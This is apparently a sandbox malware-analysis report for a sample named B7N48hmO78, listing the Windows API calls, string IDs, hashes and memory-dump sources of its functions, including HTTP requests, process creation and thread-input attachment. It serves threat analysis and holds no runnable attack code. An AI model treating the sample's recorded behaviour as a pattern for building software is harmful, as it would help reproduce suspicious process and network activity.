                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E1BA9D
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00E1BAA6
                                                                                                                  • GetParent.USER32(?), ref: 00E1BAC2
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E1BAC5
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                  • Opcode ID: 582bc2edb9192cd01df39d1877dfe76caec4952a3bab1dc5dd31f395cdf14d40
                                                                                                                  • Instruction ID: 0d644e648312a80c2a87f4a3b162f56ab8ccbae6a7d341077623e19cdda7d067
                                                                                                                  • Opcode Fuzzy Hash: 582bc2edb9192cd01df39d1877dfe76caec4952a3bab1dc5dd31f395cdf14d40
                                                                                                                  • Instruction Fuzzy Hash: B921D0B4A00208BFDF01ABA5CC85EFEBBB9EF45300F401019F551B31A1DBB5585A9B30
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32 ref: 00E1BAE3
                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00E1BAF8
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1BB0A
                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E1BB85
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                  • Opcode ID: 5f0d23b12e2edec4b75d642352258669af16ead1a27aba3a83379e0a13ca0b7a
                                                                                                                  • Instruction ID: 40214c966929f06e761f031a4137525fac776f11b611203c27cb2afb35362d62
                                                                                                                  • Opcode Fuzzy Hash: 5f0d23b12e2edec4b75d642352258669af16ead1a27aba3a83379e0a13ca0b7a
                                                                                                                  • Instruction Fuzzy Hash: 0E11E0B670C303FAFE247621EC06DEA379C9B12364F202026FA05F54E9EBE2A8D15514
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E3B2D5
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E3B302
                                                                                                                  • CoUninitialize.COMBASE ref: 00E3B30C
                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00E3B40C
                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E3B539
                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00E3B56D
                                                                                                                  • CoGetObject.OLE32(?,00000000,00E6D91C,?), ref: 00E3B590
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00E3B5A3
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E3B623
                                                                                                                  • VariantClear.OLEAUT32(00E6D91C), ref: 00E3B633
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2395222682-0
                                                                                                                  • Opcode ID: 0c705497f41e1d3f86379c6cc36a2c1707d0f10277beee23b755938cbd45562d
                                                                                                                  • Instruction ID: 156bc7372d45d77fd7d696d98424c771c23aaa4adcf625cf07141388fa86969a
                                                                                                                  • Opcode Fuzzy Hash: 0c705497f41e1d3f86379c6cc36a2c1707d0f10277beee23b755938cbd45562d
                                                                                                                  • Instruction Fuzzy Hash: A8C12371608304AFC704DF65C88996BBBE9FF88348F00595DF68AAB251DB71ED05CB62
APIs
• __lock.LIBCMT ref: 00E0ACC1
  • Part of subcall function 00E07CF4: __mtinitlocknum.LIBCMT ref: 00E07D06
  • Part of subcall function 00E07CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00E07D1F
• __calloc_crt.LIBCMT ref: 00E0ACD2
  • Part of subcall function 00E06986: __calloc_impl.LIBCMT ref: 00E06995
  • Part of subcall function 00E06986: Sleep.KERNEL32(00000000,000003BC,00DFF507,?,0000000E), ref: 00E069AC
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00E0ACED
• GetStartupInfoW.KERNEL32(?,00E96E28,00000064,00E05E91,00E96C70,00000014), ref: 00E0AD46
• __calloc_crt.LIBCMT ref: 00E0AD91
• GetFileType.KERNEL32(00000001), ref: 00E0ADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E0AE11
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00E24047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E2405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00E24062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E230A5,?,00000001), ref: 00E24071
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00E24083
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E230A5,?,00000001), ref: 00E2409C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E230A5,?,00000001), ref: 00E240AE
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E240F3
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E24108
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E230A5,?,00000001), ref: 00E24113
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DE30DC
• CoUninitialize.COMBASE ref: 00DE3181
• UnregisterHotKey.USER32(?), ref: 00DE32A9
• DestroyWindow.USER32(?), ref: 00E55079
• FreeLibrary.KERNEL32(?), ref: 00E550F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E55125
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00DFCC15
  • Part of subcall function 00DFCCCD: GetClientRect.USER32(?,?), ref: 00DFCCF6
  • Part of subcall function 00DFCCCD: GetWindowRect.USER32(?,?), ref: 00DFCD37
  • Part of subcall function 00DFCCCD: ScreenToClient.USER32(?,?), ref: 00DFCD5F
• GetDC.USER32 ref: 00E5D137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E5D14A
• SelectObject.GDI32(00000000,00000000), ref: 00E5D158
• SelectObject.GDI32(00000000,00000000), ref: 00E5D16D
• ReleaseDC.USER32(?,00000000), ref: 00E5D175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E5D200
Strings
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E345FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E3462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E3466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E34682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E3468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E346BF
• InternetCloseHandle.WININET(00000000), ref: 00E34706
  • Part of subcall function 00E35052: GetLastError.KERNEL32(?,?,00E343CC,00000000,00000000,00000001), ref: 00E35067
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E7DC00), ref: 00E3B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E7DC00), ref: 00E3B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E3B8C1
• SysFreeString.OLEAUT32(?), ref: 00E3B8EB
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E424F5
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E42688
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E426AC
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E426EC
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4270E
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E4286F
                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E428A1
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E428D0
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E42947
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4090791747-0
                                                                                                                  • Opcode ID: 61c324d16344132d5e8350eb55890a0cee2042305de337dab5dbbf89e41d1361
                                                                                                                  • Instruction ID: 83c3dab0c8355dc16755b2e658a85056fcf638947abeceac540b98e9b62df224
                                                                                                                  • Opcode Fuzzy Hash: 61c324d16344132d5e8350eb55890a0cee2042305de337dab5dbbf89e41d1361
                                                                                                                  • Instruction Fuzzy Hash: 22D1B031604340DFCB14EF25D891A6EBBE1EF84314F59945DFA89AB2A2DB31DC44CB62
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DFB759,?,00000000,?,?,?,?,00DFB72B,00000000,?), ref: 00DFBA58
                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DFB72B), ref: 00DFB7F6
                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DFB72B,00000000,?,?,00DFB2EF,?,?), ref: 00DFB88D
                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00E5D8A6
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E5D91C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2402799130-0
                                                                                                                  • Opcode ID: b54800f0502e942a4877e0757ea90d2c60b64828638544ef059c4c85caf5829a
                                                                                                                  • Instruction ID: 6313fc53abd83187f3d66d1451f3b7ea91bb66822c5d95955494ccec683239be
                                                                                                                  • Opcode Fuzzy Hash: b54800f0502e942a4877e0757ea90d2c60b64828638544ef059c4c85caf5829a
                                                                                                                  • Instruction Fuzzy Hash: 2661BD30504704DFDB359F16DD88B3577B5FBC9366F19941AE582A6A60C7B0B888CBA0
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E4B3F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: 37a91c5a5ca5cd4382709d105118577310f8b20b985e1959dcef81141d14673f
                                                                                                                  • Instruction ID: df9517baf7edb5e6fc07e248212dbe2a720bd40531bdcf1de333f30994a728c5
                                                                                                                  • Opcode Fuzzy Hash: 37a91c5a5ca5cd4382709d105118577310f8b20b985e1959dcef81141d14673f
                                                                                                                  • Instruction Fuzzy Hash: B451E530600204BFEF249F2AEC85BAE7BA5EB05768F646011F625F61E2D7B1E944CB51
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E5DB1B
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E5DB3C
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E5DB51
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E5DB6E
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E5DB95
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00E5DBA0
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E5DBBD
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00E5DBC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3992029641-0
                                                                                                                  • Opcode ID: 6344d9427e90579e99a546ca40aef3f20f1d2cef87baa1ec82ef831fc1ec811e
                                                                                                                  • Instruction ID: 0795e9ff6a81b6e2187e76cbcf6ddb5056c24fc6a43c86e854b36b079782aced
                                                                                                                  • Opcode Fuzzy Hash: 6344d9427e90579e99a546ca40aef3f20f1d2cef87baa1ec82ef831fc1ec811e
                                                                                                                  • Instruction Fuzzy Hash: 80517970A04209EFDB20DF69CC81FAA77F9EB48354F154518FA4AE6290D7B0ED84DB61
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E25FA6,?), ref: 00E26ED8
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E25FA6,?), ref: 00E26EF1
                                                                                                                    • Part of subcall function 00E272CB: GetFileAttributesW.KERNEL32(?,00E26019), ref: 00E272CC
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00E275CA
                                                                                                                  • _wcscmp.LIBCMT ref: 00E275E2
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E275FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 793581249-0
                                                                                                                  • Opcode ID: 216b17fea02316666f1950bc89d9c1ae3dd659b4f8487455ba15e36e12986b9c
                                                                                                                  • Instruction ID: c8b615728355afd9a4872373c25700300f5db340a8b97450d969921539db4a96
                                                                                                                  • Opcode Fuzzy Hash: 216b17fea02316666f1950bc89d9c1ae3dd659b4f8487455ba15e36e12986b9c
                                                                                                                  • Instruction Fuzzy Hash: 185131B2A492299ADF54EB94EC819DE73FCAF08310F1050AAF645F3141EA7497C9CB64
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00DFEAEB
                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00DFEB32
                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00E5DC86
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00E5DCF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  • Opcode ID: 7d669b668ada9953147170d96712dd3ccd0316a364ce097124529d24fad0baf2
                                                                                                                  • Instruction ID: 3b7579de2c8fb8148f80a4c97da31b94f8d4be7b53abd45251d70173fe808917
                                                                                                                  • Opcode Fuzzy Hash: 7d669b668ada9953147170d96712dd3ccd0316a364ce097124529d24fad0baf2
                                                                                                                  • Instruction Fuzzy Hash: F041047070C288DEC7354B299D8DA3ABB96EB95305F5F9809E387A6571C6B0B884D231
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B26C
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00E1AEF1), ref: 00E1B273
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E1AEF1,00000B00,?,?), ref: 00E1B288
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B290
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B293
                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E1AEF1,00000B00,?,?), ref: 00E1B2A3
                                                                                                                  • GetCurrentProcess.KERNEL32(00E1AEF1,00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B2AB
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B2AE
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00E1B2D4,00000000,00000000,00000000), ref: 00E1B2C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1422014791-0
                                                                                                                  • Opcode ID: d5c58ba5816804dde2bbcdb676b3e966cf5f98c5791ce86f14ddae87222e9417
                                                                                                                  • Instruction ID: f8753987dea2b464cc2c15d75f32983de558b84ee4946db22479d4198a3338d3
                                                                                                                  • Opcode Fuzzy Hash: d5c58ba5816804dde2bbcdb676b3e966cf5f98c5791ce86f14ddae87222e9417
                                                                                                                  • Instruction Fuzzy Hash: 72011271744344BFE710AFA5EC4DF5B3BACEB89B40F414411FA04DB2A1C6B09804CB21
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                  • API String ID: 0-572801152
                                                                                                                  • Opcode ID: f5df12c319f5e960ba8a01223532beebe42b6fd2dc2310d3c7618f896050dbdd
                                                                                                                  • Instruction ID: 888a44db9419da765fdfa1ced4a8bc5899221c1588ad2fd549c964b4ee4ad183
                                                                                                                  • Opcode Fuzzy Hash: f5df12c319f5e960ba8a01223532beebe42b6fd2dc2310d3c7618f896050dbdd
                                                                                                                  • Instruction Fuzzy Hash: 83E1A471A00219AFDF14DFA4D889AEE7BB5EF48754F249029F905BB281D770ED41CBA0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset
                                                                                                                  • String ID: Q\E$[$\$\$]$^
                                                                                                                  • API String ID: 2102423945-1026548749
